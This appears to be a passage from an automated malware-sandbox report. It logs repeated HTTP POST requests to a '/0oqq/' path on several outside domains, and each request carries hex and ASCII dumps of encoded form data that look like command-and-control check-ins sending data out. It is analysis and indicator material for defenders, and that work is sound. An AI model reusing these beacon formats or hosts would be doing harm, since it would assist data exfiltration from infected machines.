35 59 65 69 42 56 38 65 78 70 6d 73 4d 6e 34 56 48 31 79 41 45 46 6e 76 38 6e 77 75 46 56 79 43 4c 35 58 64 32 75 4b 53 37 43 44 32 5f 49 53 78 51 66 71 44 49 6f 41 4e 75 57 6a 51 30 79 44 50 45 59 43 4e 51 64 35 74 53 50 4b 56 4c 36 6c 36 4c 46 37 6c 43 31 36 67 47 6e 58 41 4c 58 49 58 7a 37 69 6a 6b 75 48 4a 4c 65 38 61 39 4e 61 37 67 77 50 59 72 36 58 6f 78 45 6c 4d 56 32 77 66 70 6d 43 42 66 41 59 5a 6b 43 63 41 65 56 74 71 44 76 64 76 6f 70 30 4e 41 7a 58 75 52 7e 2d 6e 43 57 4e 39 6e 67 68 65 64 7e 52 4e 46 6b 77 48 33 73 4b 70 4b 30 6d 61 36 4b 37 53 68 67 5a 67 66 61 33 53 72 72 2d 31 32 64 43 59 57 6a 69 39 66 71 58 66 42 63 30 63 35 77 44 46 48 43 56 49 53 55 77 44 78 75 33 37 4c 79 52 58 67 33 64 68 79 36 42 4f 49 7e 50 31 48 50 78 53 55 72 52 50 47 76 67 49 30 77 4a 38 39 6c 6a 4d 31 52 6e 59 78 39 71 71 6c 59 32 55 4c 6d 55 4c 4a 61 52 69 68 6a 66 6c 74 66 74 45 54 78 6b 53 6f 39 34 78 46 66 50 69 4d 78 6f 67 65 28 67 71 5a 31 49 67 34 50 6b 4d 4c 4d 58 46 71 28 4b 4d 43 34 33 74 34 4b 6f 4c 6e 6d 2d 36 47 35 64 7e 67 51 53 44 67 4e 46 73 76 79 64 6d 48 54 42 35 4d 48 41 67 33 53 69 51 75 79 73 6b 35 39 44 74 53 7e 72 35 31 47 35 49 43 61 77 71 54 4a 53 4f 6b 39 6a 79 46 41 7a 73 4a 35 31 42 66 7e 46 54 6e 46 33 79 71 77 6c 73 7a 57 50 34 75 4a 42 66 2d 6b 4d 50 46 59 72 55 43 41 78 67 39 69 68 71 59 6b 48 6a 32 4d 37 4e 44 78 63 4a 63 64 47 63 56 61 48 6b 31 6f 57 61 59 4d 72 51 57 59 31 4d 47 47 62 73 7a 46 30 75 6f 4a 6e 73 74 42 46 71 45 32 41 6e 6f 41 6e 28 42 35 6c 30 4b 68 44 4c 30 62 76 57 58 73 79 41 61 4e 43 75 48 58 62 56 75 31 6d 4a 5a 37 6f 43 68 49 5a 54 5f 73 6e 6b 4d 63 6f 77 78 6e 69 50 52 6e 7a 41 34 61 61 47 58 5a 32 54 6a 68 53 42 31 37 51 46 59 55 39 72 64 67 51 7e 32 44 61 5a 62 6b 70 49 56 4b 72 4f 57 37 79 28 68 6b 47 73 68 7e 52 75 6b 73 63 66 48 77 2d 4c 53 74 6c 43 32 4f 74 65 39 35 33 48 66 39 70 68 4
          Source: global trafficHTTP traffic detected: POST /0oqq/ HTTP/1.1Host: www.dirdikyepedia.comConnection: closeContent-Length: 189Cache-Control: no-cacheOrigin: http://www.dirdikyepedia.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.dirdikyepedia.com/0oqq/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 49 43 48 79 76 6a 35 3d 43 54 34 69 37 44 66 32 4d 59 41 6c 70 46 45 77 4f 66 44 41 6f 67 75 42 6d 5a 48 65 61 71 79 7a 50 69 4c 4d 59 43 74 6b 46 66 6e 54 5a 7a 76 6b 72 6f 5a 79 62 48 6c 6b 42 39 76 43 53 38 77 63 42 6c 67 75 6d 61 54 73 30 6b 6c 47 51 68 4a 4d 61 52 36 4b 6f 54 75 6b 42 71 43 4e 30 4b 38 47 71 2d 58 34 59 2d 6d 77 71 6d 59 4f 35 39 68 6a 66 4c 46 74 41 4d 4c 42 37 32 4b 30 54 6d 31 78 46 5f 62 35 39 75 4a 66 6b 47 65 4b 64 43 7e 49 63 6d 76 59 65 79 48 6b 32 71 38 43 55 6e 4e 4f 39 61 64 71 59 66 53 4d 4c 4b 33 4f 38 2d 71 35 64 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ICHyvj5=CT4i7Df2MYAlpFEwOfDAoguBmZHeaqyzPiLMYCtkFfnTZzvkroZybHlkB9vCS8wcBlgumaTs0klGQhJMaR6KoTukBqCN0K8Gq-X4Y-mwqmYO59hjfLFtAMLB72K0Tm1xF_b59uJfkGeKdC~IcmvYeyHk2q8CUnNO9adqYfSMLK3O8-q5dg).
          Source: global trafficHTTP traffic detected: POST /0oqq/ HTTP/1.1Host: www.dirdikyepedia.comConnection: closeContent-Length: 5337Cache-Control: no-cacheOrigin: http://www.dirdikyepedia.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.dirdikyepedia.com/0oqq/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 49 43 48 79 76 6a 35 3d 43 54 34 69 37 44 66 32 4d 59 41 6c 6f 6c 55 77 4d 35 4c 41 39 51 75 4f 70 35 48 65 50 36 79 33 50 69 48 4d 59 44 5a 4f 46 70 58 54 5a 69 28 6b 72 4f 4e 79 5a 48 6c 6b 56 4e 76 4f 57 38 78 48 42 6c 30 49 6d 66 33 38 30 69 56 47 52 33 4e 4d 61 78 36 4a 33 6a 75 6c 4e 4b 43 4f 35 71 38 47 71 2d 4b 5a 59 2d 4b 4b 71 6e 67 4f 35 4c 31 6a 66 4a 73 37 41 63 4c 41 35 32 4b 30 54 6d 70 71 46 5f 61 4f 39 75 77 59 6b 47 7e 4b 63 55 43 49 62 33 76 48 61 69 48 6a 36 4b 39 47 65 45 63 2d 7a 5a 52 64 57 38 61 47 45 50 69 70 31 75 28 6c 42 66 6c 38 61 58 53 64 46 31 66 4a 56 44 49 51 70 38 70 58 36 75 4b 71 30 33 50 44 39 47 76 6d 6c 4a 39 6a 5a 75 73 42 7e 67 4b 34 51 61 78 41 47 32 72 57 42 72 73 38 33 38 46 6d 43 32 43 70 6a 5a 73 78 73 75 4c 77 54 64 73 39 66 52 47 64 73 45 54 45 41 69 72 56 50 41 61 34 36 34 6f 51 71 66 4e 4c 50 5a 52 65 55 73 74 32 7a 74 61 70 67 4a 6a 6c 78 61 39 41 45 6b 66 62 4c 72 77 64 52 39 77 6e 6e 53 76 70 43 4d 4a 7a 39 33 49 67 32 63 35 6d 76 4a 64 55 61 5f 4a 69 64 32 33 78 65 6d 70 4a 74 5a 48 44 65 73 44 5f 57 49 53 75 68 6f 76 57 34 70 74 39 48 5a 4d 57 4d 2d 64 71 65 68 63 31 74 44 75 55 49 2d 66 33 30 2d 58 79 77 43 6f 6c 55 5a 58 39 66 31 59 4d 73 36 4a 39 78 4a 65 38 54 54 31 5f 6f 71 75 41 52 34 78 69 44 47 6b 55 4a 41 6f 54 59 30 46 70 58 79 31 72 4e 44 39 4e 73 45 36 64 7e 68 73 61 41 76 59 45 71 5f 6b 5a 35 70 46 32 56 57 66 4e 37 38 6d 48 48 31 70 73 59 7a 74 53 59 5f 53 4d 4a 72 57 52 74 47 70 54 44 55 6e 50 4c 72 75 46 36 48 5a 43 31 36 61 4f 51 51 42 52 74 55 63 62 62 41 65 2d 79 56 49 69 61 5f 50 6a 76 75 39 67 37 50 52 53 74 74 53 48 6a 51 33 71 41 37 6f 72 39 65 73 55 52 6f 68 63 76 66 64 47 6d 50 54 31 31 43 6e 4d 64 47 43 76 32 4b 4a 5f 33 47 64 66 35 68 66 49 63 41 62 6c 42 2d 36 76 51 39 47 6a 74 38 54 41 44 58 44 39 34 4b 54 36 47 77 42 4a 50 53 77 52 45 79 45 72 76 63 51 66 63 6b 7a 5a 6c 2d 6f 62 35 6f 50 78 38 58 73 4e 37 65 71 53 39 48 67 74 6d 36 57 58 69 78 74 50 36 74 37 32 75 33 79 73 73 7a 59 4f 73 38 4e 78 39 6f 41 78 30 79 41 31 33 53 45 42 39 33 74 76 69 79 41 72 33 57 54 4c 34 6f 7e 75 39 75 6e 34 49 32 4c 57 72 66 4b 49 55 30 58 70 78 59 39 77 72 32 4f 30 6f 4b 38 31 63 75 66 6a 74 50 39 71 7e 74 73 50 33 33 6c 36 55 46 79 43 66 66 66 32 74 54 77 37 69 35 54 56 6e 30 7e 53 6c 58 6a 45 66 32 5a 39 79 61 73 52 70 32 55 61 37 35 56 76 4d 6e 65 47 55 6c 78 66 76 35 59 78 62 30 76 78 78 4d 4e 72 34 6b 32 57 32 44 6e 74 46 6a 59 36 4b 65 61 59 56 73 71 6a 6e 42 5a 4e 6e 6e 6d 2d 44 71 58 62 6e 71 39 4e 4b 59 57 5a 67 4c 4e 77 6c 73 30 65 47 32 75 2d 71 71 58 50 48 4
          Source: global trafficHTTP traffic detected: POST /0oqq/ HTTP/1.1Host: www.g2fm.co.ukConnection: closeContent-Length: 189Cache-Control: no-cacheOrigin: http://www.g2fm.co.ukUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.g2fm.co.uk/0oqq/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 49 43 48 79 76 6a 35 3d 72 70 4e 6f 6d 70 6e 76 68 39 48 46 35 69 39 48 6b 64 65 5a 32 50 6d 32 55 31 6a 61 74 64 64 35 51 68 54 64 28 66 36 7a 54 35 46 59 77 51 68 53 7e 71 54 4c 52 4d 67 75 6d 77 68 6c 76 4a 58 4f 4d 58 51 71 4f 39 71 33 54 52 31 42 74 56 4e 70 6f 32 47 43 61 38 4a 61 52 31 48 4d 55 6d 43 33 50 78 78 6d 65 4c 4a 2d 77 64 34 49 48 66 4f 70 41 34 35 51 63 4e 6c 69 79 6d 49 57 75 6c 64 34 51 30 67 34 4d 30 4d 72 7e 48 4e 4e 59 6f 61 38 72 34 4b 79 38 57 59 4d 49 4a 78 4d 44 66 4f 50 7e 5a 38 48 56 70 4e 54 4d 2d 79 38 59 71 6e 4e 50 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ICHyvj5=rpNompnvh9HF5i9HkdeZ2Pm2U1jatdd5QhTd(f6zT5FYwQhS~qTLRMgumwhlvJXOMXQqO9q3TR1BtVNpo2GCa8JaR1HMUmC3PxxmeLJ-wd4IHfOpA45QcNliymIWuld4Q0g4M0Mr~HNNYoa8r4Ky8WYMIJxMDfOP~Z8HVpNTM-y8YqnNPw).
          Source: global trafficHTTP traffic detected: POST /0oqq/ HTTP/1.1Host: www.g2fm.co.ukConnection: closeContent-Length: 5337Cache-Control: no-cacheOrigin: http://www.g2fm.co.ukUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.g2fm.co.uk/0oqq/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 49 43 48 79 76 6a 35 3d 72 70 4e 6f 6d 70 6e 76 68 39 48 46 36 43 4e 48 69 2d 47 5a 39 50 6d 31 65 56 6a 61 69 39 64 39 51 68 50 64 28 65 75 6a 47 62 70 59 77 44 70 53 28 49 37 4c 54 4d 67 75 6b 77 68 68 79 5a 58 63 4d 58 31 54 4f 35 76 56 54 54 35 42 74 48 31 70 72 57 47 44 47 73 4a 62 63 56 48 4c 62 47 43 33 50 78 39 4c 65 4a 67 4c 77 63 41 49 48 4a 61 70 41 36 68 54 64 64 6c 6e 39 47 49 57 75 6c 52 6a 51 30 67 4f 4d 30 6b 37 7e 48 74 4e 5a 37 43 38 71 71 69 7a 73 32 59 31 58 35 77 6e 43 36 58 56 33 62 6b 4d 65 72 6c 66 45 62 6d 73 53 4c 69 6b 55 41 70 52 59 55 52 48 79 61 4a 5a 47 33 74 32 4f 4c 37 6f 42 59 51 4e 71 71 62 45 76 71 77 48 43 48 64 48 75 4e 55 42 39 43 38 62 78 73 5a 50 7a 38 42 64 4e 36 35 2d 67 67 4e 37 6d 72 72 45 77 36 4d 68 59 72 32 4c 54 77 42 4c 36 56 79 78 77 52 6d 6b 46 2d 68 6a 7e 59 4a 4e 55 71 35 42 49 42 77 6a 5a 4d 44 46 7a 52 59 6c 34 56 62 38 74 61 47 6e 45 79 31 61 37 62 53 39 51 55 39 59 41 67 4b 41 4f 48 4d 57 77 53 75 54 78 42 67 62 52 7a 48 68 28 31 78 30 67 55 6b 69 53 50 69 7a 69 62 31 45 50 6e 6b 6b 6f 35 78 6f 53 4f 61 41 63 4a 4b 51 30 54 70 43 42 32 64 4b 53 30 70 4e 6f 50 65 4b 33 6c 39 54 50 63 6f 71 28 77 63 43 4f 6a 43 58 77 33 48 56 61 46 41 74 36 36 43 55 63 57 7e 38 71 36 62 63 73 47 79 65 76 7a 54 56 4a 66 56 52 68 55 57 73 6f 4a 4e 33 48 72 79 6a 4b 52 4d 61 50 71 4d 39 65 2d 45 56 56 58 66 5f 55 36 70 45 57 64 59 45 7e 6c 4e 46 71 57 78 64 58 43 47 37 57 45 78 5f 77 52 6d 78 6a 36 5a 32 68 74 4a 39 47 44 4d 62 47 61 4b 37 67 66 48 53 4a 66 46 47 51 74 70 37 48 6d 6d 6e 76 4e 42 4e 52 33 49 37 66 46 67 54 70 6c 57 33 50 4e 4b 70 43 5a 61 7a 77 73 41 38 34 6d 72 79 6b 64 42 6b 41 79 49 6d 36 6c 62 70 36 6c 6f 35 45 61 33 52 32 62 52 73 79 79 7a 72 48 68 6a 38 66 78 79 6e 33 2d 4d 6d 39 48 45 37 70 6a 51 53 6c 66 54 72 38 4c 33 4a 69 38 28 4e 7e 71 32 76 32 69 4e 45 55 41 41 37 35 6e 74 6f 58 45 78 38 58 6f 68 54 64 47 56 6a 52 2d 50 6e 62 58 49 50 6c 69 64 5f 7e 7a 6a 41 31 47 51 41 66 62 42 69 4a 68 45 61 78 62 76 35 38 73 58 5f 4d 4d 34 64 56 6b 51 35 6f 44 67 77 32 4e 79 49 7e 6e 53 32 35 35 55 63 5a 32 39 62 43 31 71 71 39 66 75 42 54 30 62 47 6f 49 6b 52 37 33 4e 4e 6e 55 5a 65 34 43 7a 2d 44 68 57 54 6d 64 6b 34 73 4a 44 6b 42 50 76 4d 69 34 49 68 6a 35 50 4b 39 64 33 56 6d 4a 65 7a 37 72 45 45 6d 47 70 43 52 73 67 37 75 4b 6c 71 55 6c 52 57 72 76 50 43 6f 4b 53 63 4d 75 76 4b 52 47 49 58 59 4a 63 56 67 69 76 36 46 44 43 74 7e 62 52 48 4e 2d 36 69 4d 4a 65 4e 66 4c 39 70 46 30 4c 42 79 38 64 71 74 57 48 41 4a 50 39 73 36 41 4d 77 4d 62 71 59 36 67 34 57 52 56 7e 56 4f 53 48 43 5a 4f 33 6e 42 4b 6c 55 7
          Source: global trafficHTTP traffic detected: POST /0oqq/ HTTP/1.1Host: www.mynichemarket.co.ukConnection: closeContent-Length: 189Cache-Control: no-cacheOrigin: http://www.mynichemarket.co.ukUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.mynichemarket.co.uk/0oqq/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 49 43 48 79 76 6a 35 3d 57 4e 4b 67 70 31 48 63 4c 33 56 4e 6e 30 34 42 44 75 28 6e 6e 68 46 38 34 4f 74 79 59 4c 54 47 74 4b 74 79 64 4e 64 75 6b 37 55 43 6c 46 5a 38 79 6e 78 78 49 63 69 2d 31 6a 76 31 28 2d 7e 71 72 36 38 4d 42 6d 65 68 5a 45 4b 6c 41 4a 51 6b 70 50 35 33 54 42 70 43 67 47 58 32 58 63 47 52 54 74 58 46 35 6f 4e 75 72 75 54 48 65 62 70 4f 52 37 4c 62 5a 30 4f 4b 4e 71 62 74 4d 39 47 79 38 6b 63 6a 7a 57 47 36 4e 41 4a 32 66 4b 35 46 4a 39 6d 46 34 45 41 67 78 4b 62 6c 61 53 49 71 74 76 59 39 4a 37 4e 4c 64 30 51 4d 59 5a 78 70 74 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ICHyvj5=WNKgp1HcL3VNn04BDu(nnhF84OtyYLTGtKtydNduk7UClFZ8ynxxIci-1jv1(-~qr68MBmehZEKlAJQkpP53TBpCgGX2XcGRTtXF5oNuruTHebpOR7LbZ0OKNqbtM9Gy8kcjzWG6NAJ2fK5FJ9mF4EAgxKblaSIqtvY9J7NLd0QMYZxptQ).
          Source: global trafficHTTP traffic detected: POST /0oqq/ HTTP/1.1Host: www.mynichemarket.co.ukConnection: closeContent-Length: 5337Cache-Control: no-cacheOrigin: http://www.mynichemarket.co.ukUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.mynichemarket.co.uk/0oqq/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 49 43 48 79 76 6a 35 3d 57 4e 4b 67 70 31 48 63 4c 33 56 4e 6d 55 6b 42 47 4e 58 6e 68 42 46 39 6b 65 74 79 44 37 54 43 74 4b 68 79 64 4e 31 2d 6e 4e 73 43 69 53 64 38 31 45 56 78 4f 63 69 2d 7a 6a 76 35 37 2d 28 6f 72 2d 55 49 42 6d 4f 62 5a 48 6d 6c 50 5f 4d 6b 35 5f 35 30 66 42 70 44 6e 47 58 31 64 38 47 52 54 74 71 35 35 70 4e 59 72 75 62 48 66 70 68 4f 52 2d 66 61 59 6b 4f 4c 53 36 62 74 4d 38 36 68 38 6b 64 59 7a 57 66 68 4e 41 70 32 63 34 52 46 4d 70 79 45 78 30 41 6e 28 71 61 6e 4b 42 52 6d 6b 39 67 4a 42 49 78 7a 54 43 70 35 64 37 34 43 75 5a 48 38 46 30 70 59 69 5f 72 6b 68 4e 62 4a 62 68 50 66 78 46 38 55 35 36 4b 56 53 67 77 33 31 5a 59 61 73 50 65 39 31 45 28 7a 74 55 7e 53 49 55 7a 6c 52 4c 53 45 5a 31 4b 73 78 38 7e 32 43 71 6a 42 4f 58 32 34 50 44 4e 30 50 4f 30 6e 39 79 74 7a 30 43 51 72 50 43 49 42 67 37 28 4d 38 62 67 4d 6f 35 63 35 4c 5f 66 72 7a 61 42 44 71 63 37 5f 31 6f 7e 4b 58 58 74 30 38 6b 37 53 35 68 4f 41 43 38 33 75 52 4b 70 79 4c 6a 38 62 50 55 6c 41 59 6e 4e 74 31 6f 39 68 76 48 77 49 39 32 43 33 57 72 56 5a 70 51 7a 34 4e 75 38 35 44 6b 73 32 6e 38 6c 7a 61 51 69 45 4d 6b 41 41 32 6a 39 6c 39 36 32 6e 63 69 78 35 55 4c 30 79 4f 71 37 63 62 79 63 68 76 5a 6b 59 55 50 7e 66 51 33 61 6f 33 54 73 2d 77 4e 69 41 61 35 71 4b 7a 5f 57 55 28 7a 77 46 38 62 45 68 7a 37 70 50 4c 6a 4c 36 4a 68 68 35 67 37 59 5f 75 45 33 30 4a 4c 69 77 51 77 44 58 43 70 39 71 58 5a 5a 67 32 59 55 4a 4b 69 6f 61 4a 75 56 4e 42 4e 63 52 65 6c 49 73 30 75 63 58 58 59 62 73 58 59 64 47 43 73 61 55 70 68 4f 61 6a 7a 30 2d 57 67 50 49 7e 4e 59 78 43 65 41 77 34 43 4b 74 31 34 28 6e 64 45 38 65 65 64 28 62 55 6c 33 4a 34 35 67 53 4c 79 4c 31 75 78 50 36 76 59 33 55 30 70 58 4e 73 57 41 48 75 47 76 32 58 68 4c 69 37 6b 79 50 59 69 45 75 59 6d 79 78 55 4f 4b 73 78 68 46 31 35 4f 59 42 37 73 76 5a 63 79 43 50 68 79 62 7a 72 6c 54 54 6f 4b 79 78 6f 51 78 64 7e 34 28 65 28 4d 45 4e 78 62 48 58 64 70 48 75 6a 6e 37 4d 47 63 57 58 4b 4f 69 30 49 68 79 68 31 35 6e 79 76 79 6c 55 62 71 39 30 68 58 72 4b 46 71 6f 58 64 58 59 65 6a 7a 68 45 73 43 44 78 42 6d 4b 62 70 67 53 37 36 70 68 67 65 6c 42 67 6e 44 6f 77 76 33 62 30 56 6f 66 57 50 6d 32 78 4e 30 37 77 58 39 79 33 47 4f 7e 4b 48 38 59 6d 34 33 39 64 71 78 51 30 6c 44 49 39 6e 47 62 4e 58 48 62 61 72 45 46 58 70 54 69 66 6a 49 28 4d 57 4f 41 34 4f 75 71 62 4d 4c 66 41 68 4f 30 71 67 6f 35 76 5a 67 41 44 6d 55 56 50 53 41 49 4c 46 41 71 63 6d 6a 42 55 73 63 69 6b 46 56 70 63 6f 4a 6e 50 68 59 49 34 57 50 66 45 55 68 79 34 54 45 28 32 42 66 64 55 61 67 55 34 6d 31 38 4a 49 65 79 4a 6f 50 75 4
          Source: global trafficHTTP traffic detected: POST /0oqq/ HTTP/1.1Host: www.landlotto.ruConnection: closeContent-Length: 189Cache-Control: no-cacheOrigin: http://www.landlotto.ruUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.landlotto.ru/0oqq/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 49 43 48 79 76 6a 35 3d 7e 58 46 38 47 68 66 69 51 35 56 61 35 75 6d 76 47 57 46 54 6f 4f 7e 73 50 74 44 49 65 4e 75 36 4b 71 58 44 6d 55 58 39 74 53 6d 6c 4c 6a 32 4e 58 42 4b 65 48 72 78 59 45 42 54 42 48 53 66 64 70 63 64 66 46 71 6c 36 53 53 34 4a 39 61 61 6c 31 34 48 2d 36 32 77 39 64 64 79 2d 33 37 44 48 64 79 6d 38 35 39 65 57 70 72 53 52 32 77 70 34 7a 55 74 63 73 32 53 77 57 32 45 75 47 4a 30 55 35 52 56 62 61 38 55 42 4e 37 6e 61 54 6c 30 52 76 44 5a 57 61 52 4c 39 42 32 45 42 49 39 43 31 43 48 76 6a 4a 39 47 70 52 65 74 41 65 76 65 4a 48 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ICHyvj5=~XF8GhfiQ5Va5umvGWFToO~sPtDIeNu6KqXDmUX9tSmlLj2NXBKeHrxYEBTBHSfdpcdfFql6SS4J9aal14H-62w9ddy-37DHdym859eWprSR2wp4zUtcs2SwW2EuGJ0U5RVba8UBN7naTl0RvDZWaRL9B2EBI9C1CHvjJ9GpRetAeveJHA).
          Source: global trafficHTTP traffic detected: POST /0oqq/ HTTP/1.1Host: www.landlotto.ruConnection: closeContent-Length: 5337Cache-Control: no-cacheOrigin: http://www.landlotto.ruUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.landlotto.ru/0oqq/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 49 43 48 79 76 6a 35 3d 7e 58 46 38 47 68 66 69 51 35 56 61 72 65 36 76 4b 58 46 54 28 65 7e 7a 44 4e 44 49 55 74 75 32 4b 71 62 44 6d 57 37 74 74 68 4b 6c 4c 31 6d 4e 51 69 79 65 46 72 78 59 43 42 54 46 4a 79 66 31 70 63 4a 54 46 6f 38 50 53 51 30 4a 38 49 79 6c 79 59 48 39 6d 6d 77 38 63 64 79 39 7a 37 44 48 64 79 71 67 35 5f 6e 6a 70 71 36 52 32 43 78 34 7a 51 4d 4b 71 6d 53 78 4a 47 45 75 47 4a 78 61 35 52 56 71 61 38 4e 63 4e 37 48 61 54 30 45 52 6f 52 68 56 4e 52 4c 2d 49 57 46 52 50 34 72 36 45 57 54 50 50 64 4b 5a 53 61 77 43 52 2d 6e 65 55 67 67 68 71 73 6e 36 6f 62 6f 4e 36 55 65 4c 63 70 28 58 51 67 58 72 62 6c 50 6a 73 62 57 5a 66 66 4b 41 6d 74 68 41 4f 39 58 6f 50 30 5a 36 55 5f 33 76 64 74 62 5f 32 42 57 4b 6b 46 61 35 36 72 36 68 6f 45 59 6c 33 38 70 68 4a 41 55 6b 56 38 76 79 69 6c 4e 52 73 34 71 34 78 33 28 6b 76 62 70 33 53 33 59 36 52 74 33 4b 57 78 78 38 50 65 32 76 7e 6a 4f 77 68 74 52 51 62 32 63 43 44 35 75 4c 50 68 43 4a 47 57 70 6d 74 4f 79 74 67 5f 68 6c 7a 77 31 4e 6f 57 30 54 28 6e 4b 35 4d 44 47 49 62 34 66 68 59 74 6c 63 4e 55 79 55 6e 6a 44 35 6c 51 34 57 63 79 67 54 5a 74 62 32 4b 59 6e 49 28 30 77 30 45 59 6a 73 41 4f 6e 34 33 77 69 30 73 6e 5a 32 33 46 72 4d 31 43 33 4c 4c 34 28 4e 79 34 64 69 55 62 59 37 46 69 48 36 56 38 55 55 50 74 33 75 6b 6e 59 65 53 6e 39 71 77 52 5a 51 55 63 4a 79 35 69 79 79 54 74 4c 59 75 6e 35 68 65 49 38 5f 74 31 66 68 39 46 79 76 4a 70 6e 76 68 45 36 4d 50 32 6e 58 6a 45 78 66 75 4e 69 6e 4c 41 68 66 6a 6a 46 6a 65 4d 6e 30 4e 62 6d 58 34 59 41 50 37 79 37 6d 59 53 55 39 49 4d 74 59 78 46 7e 61 36 62 51 79 68 6c 6b 6f 4e 6d 5a 36 31 4a 30 31 39 6b 38 35 6f 61 49 57 6d 59 7a 46 6e 4b 72 36 37 4c 68 79 46 31 5a 44 63 71 45 5a 55 5a 4a 45 35 57 54 4e 46 45 50 32 4a 31 44 45 59 4c 56 4f 6d 30 5a 76 55 42 75 31 42 2d 65 4b 7a 31 38 76 70 51 6c 39 51 74 52 46 79 71 53 56 63 72 59 42 53 6b 47 63 49 73 44 36 38 33 75 73 57 71 45 6d 38 72 50 74 6b 48 64 6f 37 4d 6a 71 63 30 44 54 57 67 32 6e 49 62 71 67 6d 4a 75 36 41 6c 33 45 7e 4a 44 31 48 71 75 5a 78 52 72 61 7e 4f 6c 30 79 6b 7a 77 61 32 4c 6e 44 51 74 79 4e 43 42 46 6d 53 47 78 4e 76 6f 6b 31 56 78 42 31 33 33 32 4b 7a 54 6a 76 2d 30 6e 77 4d 79 31 56 30 61 68 30 64 58 51 72 53 61 50 6d 4a 64 71 73 55 77 59 4a 6f 4b 38 6a 72 37 70 79 4b 52 41 46 38 53 64 53 56 38 75 4f 71 45 53 4c 39 62 78 62 30 41 4e 70 52 35 39 36 54 37 63 6d 69 61 5f 42 51 49 76 47 68 38 39 37 35 49 67 52 6e 38 39 66 77 6b 5f 4d 4b 35 48 74 32 59 57 6f 61 4c 75 68 78 74 52 42 59 67 69 73 79 46 31 45 34 28 61 43 65 33 78 36 61 58 6d 30 4e 54 50 63 4f 43 7a 7e 6e 6c 47 49 50 6
          Source: global trafficHTTP traffic detected: POST /0oqq/ HTTP/1.1Host: www.gorwly.topConnection: closeContent-Length: 189Cache-Control: no-cacheOrigin: http://www.gorwly.topUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.gorwly.top/0oqq/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 49 43 48 79 76 6a 35 3d 6d 4a 49 72 47 4b 30 6b 4a 36 58 6e 46 33 39 58 4b 76 65 71 79 6c 43 57 6a 4d 4c 67 7a 51 45 64 47 65 70 2d 68 78 72 45 78 45 32 58 4f 79 53 69 39 78 76 45 48 2d 4f 44 54 30 52 4a 36 72 56 6e 4e 45 62 69 4f 35 47 51 41 6a 43 4d 6e 78 51 66 43 43 69 71 71 77 58 32 43 34 44 6a 4a 77 36 31 48 63 73 57 67 49 55 42 62 70 48 35 70 30 52 4d 58 39 6c 61 48 70 51 32 56 4a 47 68 70 6d 75 50 76 4f 72 53 43 51 6d 35 49 53 66 4d 4d 4d 6a 64 44 50 7a 30 43 6a 55 42 4a 42 4e 79 44 43 69 41 52 54 48 49 48 74 41 39 39 4a 4f 36 7a 32 37 50 34 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ICHyvj5=mJIrGK0kJ6XnF39XKveqylCWjMLgzQEdGep-hxrExE2XOySi9xvEH-ODT0RJ6rVnNEbiO5GQAjCMnxQfCCiqqwX2C4DjJw61HcsWgIUBbpH5p0RMX9laHpQ2VJGhpmuPvOrSCQm5ISfMMMjdDPz0CjUBJBNyDCiARTHIHtA99JO6z27P4w).
          Source: global trafficHTTP traffic detected: POST /0oqq/ HTTP/1.1Host: www.gorwly.topConnection: closeContent-Length: 5337Cache-Control: no-cacheOrigin: http://www.gorwly.topUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.gorwly.top/0oqq/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 49 43 48 79 76 6a 35 3d 6d 4a 49 72 47 4b 30 6b 4a 36 58 6e 45 58 4e 58 49 4f 65 71 36 6c 43 58 67 4d 4c 67 39 77 45 52 47 65 6c 2d 68 77 65 42 78 32 61 58 4f 68 71 69 38 53 48 45 46 2d 4f 44 58 45 51 41 33 4c 56 78 4e 45 28 41 4f 35 32 71 41 68 4f 4d 6b 46 34 66 43 69 69 70 6d 77 58 7a 42 34 44 38 48 51 36 31 48 63 67 4b 67 4a 55 5f 62 6f 28 35 6f 47 5a 4d 58 37 78 64 49 5a 51 37 58 4a 47 68 70 6d 69 36 76 4f 72 43 43 52 4f 70 49 52 58 4d 4d 61 50 64 4e 36 54 33 4c 54 55 4b 58 52 4d 43 4d 48 4c 6c 64 6b 4c 36 42 4d 63 34 28 70 76 31 6e 48 71 58 73 49 6e 37 68 77 30 38 6e 70 4e 